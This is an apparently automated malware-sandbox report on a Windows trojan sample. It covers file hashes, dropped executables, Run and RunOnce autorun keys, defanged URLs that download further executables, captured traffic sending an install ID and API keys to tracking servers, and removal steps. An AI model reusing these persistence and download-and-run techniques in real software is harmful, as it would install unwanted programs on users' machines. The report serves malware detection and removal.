Sample_e68ca5ec6a
HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: e68ca5ec6a07d63c252f085c4c4dd849
SHA1: d9a386c7f4ba437063653f9ce650e39bd0de822b
SHA256: 55decbd4501d581a970fd68b5400ea75ec06b7e8cc904354c19e25e812b1beca
SSDeep: 12288:QckJXcc1RD6w/UUFOeKSU78XnHML5LM0AD0EQ:gycRDX/RU7yeH
Size: 395264 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-10-23 19:47:39
Analyzed on: Windows 7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
OneTwo.exe:676
%original file name%.exe:4008
up.exe:3244
The Trojan injects its code into the following process(es):
EQXKU2FY9.exe:2260
%original file name%.exe:2668
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process EQXKU2FY9.exe:2260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\EQXKU2FY92\cast.config (38 bytes)
The process OneTwo.exe:676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\EQXKU2FY92\uninstaller.exe (8203 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\EQXKU2FY9.exe.config (1 bytes)
%Program Files%\EQXKU2FY92\EQXKU2FY9.exe (66463 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.676.5090640 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.676.5090640 (0 bytes)
The process %original file name%.exe:2668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe (13250 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe (183001 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe.config (1 bytes)
C:\config.conf (47 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\SecondL.exe (0 bytes)
The process up.exe:3244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (836 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (836 bytes)
Registry activity
The process EQXKU2FY9.exe:2260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\EQXKU2FY9_RASMANCS]
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CAYP7XY9GOM4WZF" = "%Program Files%\EQXKU2FY92\EQXKU2FY9.exe"
The process OneTwo.exe:676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Classes\Local Settings\MuiCache\63\52C64B7E]
"LanguageList" = "en-US, en"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:2668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Classes\Local Settings\MuiCache\63\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\e68ca5ec6a07d63c252f085c4c4dd849_RASMANCS]
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_2SC4W" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process up.exe:3244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"MaxFileSize" = "1048576"
Dropped PE files
MD5 | File path |
---|---|
f430be4d53f89779b19169548173f089 | c:\Program Files\EQXKU2FY92\EQXKU2FY9.exe |
db7af23ed8a9718ec7d7b8a2632e1ca3 | c:\Program Files\EQXKU2FY92\uninstaller.exe |
5baff1e9d18e015d2b0ad1f2ebab3559 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe |
2479b0932451b275445d77674766e746 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: UC96U1O1N
Product Name: UC96U
Product Version: 3.2.7.6
Legal Copyright: Copyright (c) 7946
Legal Trademarks:
Original Filename: Sxa77s.exe
Internal Name: Sxa77s.exe
File Version: 3.2.7.6
File Description: UC96U
Comments: U
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 389428 | 389632 | 4.19324 | c9cb8ebd85b5c4f760055c44b368f55f |
.rsrc | 401408 | 4216 | 4608 | 3.40072 | 441513b8f7cb04e7a0da7231bf709f6c |
.reloc | 409600 | 12 | 512 | 0.070639 | 1ee237fc5977cb7108e999d558bda049 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://asedownloadgate.com/3/000000/wizzcaster_installer_v2.exe | |
hxxp://asedownloadgate.com/exe/updater.exe | |
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
hxxp://asedownloadgate.com/download/3/wizzcaster_v2.exe | |
hxxp://asedownloadgate.com/download/3/wizzcaster_uninstaller_v2.exe | |
hxxp://agent.wizztrakys.com/api/v5/config | |
hxxp://agent.wizztrakys.com/api/v5/link | |
hxxp://thegrandemanager.com/remotes_xml_sections.php | |
hxxp://ladomainadeserver.com/api/v5/config | |
hxxp://ladomainadeserver.com/api/v5/link | |
dns.msftncsi.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:37 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=d2947b2002bd1faa243758feab4d12761618cdc3; expires=Sun, 12-Nov-2017 05:01:37 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:38 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=8de21df789bed94ee412bacc0695c276af4183a0; expires=Sun, 12-Nov-2017 05:01:38 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:36 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: asedownloadgate.com
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:37 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: thegrandemanager.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=vs5evbefttjqgb1v0shntqo793; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:35 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=1h8eehb8aum5ds8vsg57veaf83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:36 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=0tdq0r2v0dr4rguqsr05n05cd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:33 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /exe/updater.exe HTTP/1.1
Host: asedownloadgate.com
HTTP/1.1 200 OK
Date: Sun, 12 Nov 2017 03:01:33 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
The Trojan connects to the servers at the following location(s):
uSql
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
OneTwo.exe:676
%original file name%.exe:4008
up.exe:3244
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\EQXKU2FY92\cast.config (38 bytes)
%Program Files%\EQXKU2FY92\uninstaller.exe (8203 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\EQXKU2FY9.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\EQXKU2FY92\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe (13250 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe (183001 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\S8VWHEV2JO\up.exe.config (1 bytes)
C:\config.conf (47 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"CAYP7XY9GOM4WZF" = "%Program Files%\EQXKU2FY92\EQXKU2FY9.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_2SC4W" = "C:\%original file name%.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.